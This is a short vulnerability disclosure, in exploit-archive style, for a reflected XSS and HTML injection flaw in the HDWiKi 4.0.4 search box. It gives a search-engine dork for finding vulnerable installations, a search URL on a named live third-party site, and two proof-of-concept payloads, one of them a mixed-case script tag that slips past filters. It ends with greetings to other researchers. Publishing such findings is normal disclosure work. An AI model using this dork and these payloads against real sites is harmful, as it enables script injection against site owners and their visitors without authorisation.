========================================================================
| # Title : HDWiKi V 4.0.4 XSS html inject vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Tested on : windows 8.1 FranASSais V.(Pro)
| # Version : Ver 4.0.4
| # Vendor : http://kaiyuan.hudong.com/
========================================================================
Dork : Powered by HDWiKi V 4.0.4
POc :
1 - in search box uhttp://www.zgbxw.net/hdwiki/index.php?search-default use payload
<marquee><font color=lime size=32>indoushka</font></marquee>
or
<ScRiPt>prompt(00213771818860)</ScRiPt>
Greetz :
jericho http://attrition.org & http://www.osvdb.org/ * http://packetstormsecurity.com * Larry W. Cashdollar*
Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be *
